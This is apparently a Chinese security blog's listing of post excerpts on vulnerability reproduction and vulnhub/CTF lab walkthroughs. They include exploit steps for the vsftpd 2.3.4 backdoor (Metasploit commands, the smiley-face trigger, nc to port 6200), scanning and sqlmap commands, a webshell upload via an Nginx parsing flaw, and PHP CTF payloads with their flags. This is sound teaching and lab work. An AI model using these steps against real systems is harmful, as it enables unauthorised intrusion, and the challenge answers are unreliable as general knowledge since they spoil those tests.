漏洞描述攻击者可以利用该漏洞执行PHP 命令,也可以称作 phpStudy 后门 。RCE(Remote Command|Code Execute)
Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。 其中2016、2018版本的phpstudy存在被黑客恶意篡改后形成的RCE漏洞。该漏洞可以直接远程执行系统命令。
影响版本 phpStudy 2016和2018两个版本
后门代码存在于\ext\php_xmlrpc.dll模块中
phpStudy2016 查看
\phpStudy\php\php-5.2.17\ext\php_xmlrpc.dll
\phpStudy\php\php-5.4.45\ext\php_xmlrpc.dll
phpStudy2018查看
\phpStudy\PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
\phpStudy\PHPTutorial\PHP\PHP-5.2.1 ...
环境搭建压缩包需要下载特定版本,官方提供的安装包没有这个漏洞
1.靶机环境是centos7 ,首先解压缩包,并上传到靶机目录
tar -zxvf 压缩包名称
2.进入vsftpd目录,赋予文件权限,之后进行make &&make install
cd /vsftpd-2.3.4
chmod 777 *
make &&make install
漏洞利用code:1使用msf利用
123use exploit/unix/ftp/vsftpd_234_backdoor set RhoSTS 192.168.142.145exploit
code:2手动利用
打开命令行登录ftp服务器,在用户名处输入root:)然后随意输入一个密码回车等待,
输入nc 目标ip 6200 即可连接
漏洞描述通达OA是一套使用比较广泛的办公系统。该漏洞因为使用uid作为身份标识,攻击者在远程且未经授权的情况下,通过利用此漏洞,可以直接绕过登录验证逻辑,伪装为系统管理员身份登录OA系统。通达OA官方于2020年4月17日发布安全更新。
漏洞影响版本通达OA < 11.5通达OA 2017版本
漏洞原理本次复现为2017版本,则重点分析该版本,但原理都是基本相同的,只不过文件路径不同而已。根据POC的代码分析如下,该漏洞涉及的文件包含以下四个:
1234/ispirit/login_code.php/general/login_code_scan.php/ispirit/login_code_check.php/general/index.php
通达OA源码使用zend5加密 ,分析源码需要先进行解密
本事使用的解密工具是:SeayDzend,工具使用很简单
/ispirit/login_code.php:
该文件用来获取codeuid参数,如果不存在,则会自动生成一个codeuid,并且将其写入CODE_LOGIN_PC缓存中(通达OA使用了缓存系统 ...
vulnhub靶机
未读靶机介绍靶机介绍:https : //download.vulnhub.com/dc/DC-2.zip
信息搜集
获取IP地址
1234扫描靶机的IP的方法1. nmap -sP 192.168.142.0/24 #nmap进行ping扫描发现存活主机2. arp-scan -l #基于ARP发现内网存活主机3. netdiscover -r 192.168.142.0/24 -i eth0
12345参考文章:nmap思维导图:https://mp.weixin.qq.com/s/42dNv-q7K_XcJ7cv23LNSAarp-scan:https://blog.csdn.net/qq_41453285/article/details/100942591 https://www.kali.org/tools/arp-scan/netdiscover:https://blog.csdn.net/u010698107/article/details/115288643
扫描靶机开放端口
12使用nmap扫 ...
vulnhub靶机
未读靶机介绍官方下载地址:https://www.vulnhub.com/entry/hackademic-rtb1,17/需要读取靶机的root目录下key.txt运行环境:虚拟机网络设置的是NAT模式靶机:IP地址:192.168.233.131攻击机:kali linux,IP地址:192.168.233.129
信息收集获取靶机IP地址
进入靶机
用wappalyzer查看用到技术
查看开放的端口
扫敏感目录
123nikto -h http://192.168.233.131dirb http://192.168.233.131/Hackademic_RTB1/gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html -u http://192.168.233.131
漏洞利用web端寻找漏洞,php页面,f12代码注入,sql注入
sqlmap注入
1sqlmap -u http://192.168.243.128/Hackadem ...
启动环境1startup.bat
2. 访问抓包修改文件后缀
可以显示phpinfo
Nginx 解析漏洞复现1.开启环境
2.抓包修改文件后缀,类型以及内容头
上传成功
使用蚁剑连接
PHP特性01payload:
1?username[]=admi&password[]=admin
qsnctf{ca5f80d8-085c-4a8d-b474-a74bd1a4aada}
PHP特性02payload:
1?value=%0c1
qsnctf{c6c71221-f298-41ad-9da8-ca53b4a8b144}
12345//在php中:<?phpnum = %0c36;var_dump($num!=='36' and $num=='36');// ---> True?>
对于比较运算符号:如果两个操作数都是 数字字符串,或者一个操作数是数字而另一个是 数字字符串,则比较以数字方式进行。当比较是===或!==因为这涉及比较类型和值时,不会发生类型转换 ,因此此时类型和数值都要比对
所以:**==比较的是类型转换之后的数值 而 !==不仅要比较数值还要比较类型**
payload构造的时候只要 ...
vulnhub靶机导入之后kali扫描不到IP
这种情况一般是靶机没有自动获取IP地址,网卡名称和网卡配置文件里面的名称不一致
问题产生在vulnhub下载靶机,将网段调整为了NAT模式,在kali进行扫描时获取不到靶机IP
解决方案关闭靶机,然后再启动靶机,启动时按shift进入如下页面
然后按e进行编辑
摁↓找到ro,将ro改为 rw single init=/bin/bash
然后按ctrl+x,就可以输入命令了
ip a查看以下实际用的是哪一个网卡
查看网络配置文件/etc/network/interfaces内容,将enp0s3全部改为ens33 保存退出
新版Ubuntu网卡配置文件在 /etc/netplan/XX-installer-config.yaml
然后重启网络即可
这样kali那边使用arp-scan进行扫描就可以获得靶机IP了
最后需要重新启动靶机
Linux重启网卡的三种方法:12345678910111213141516171819202122232425262728一、network利用root帐户# service netwo ...
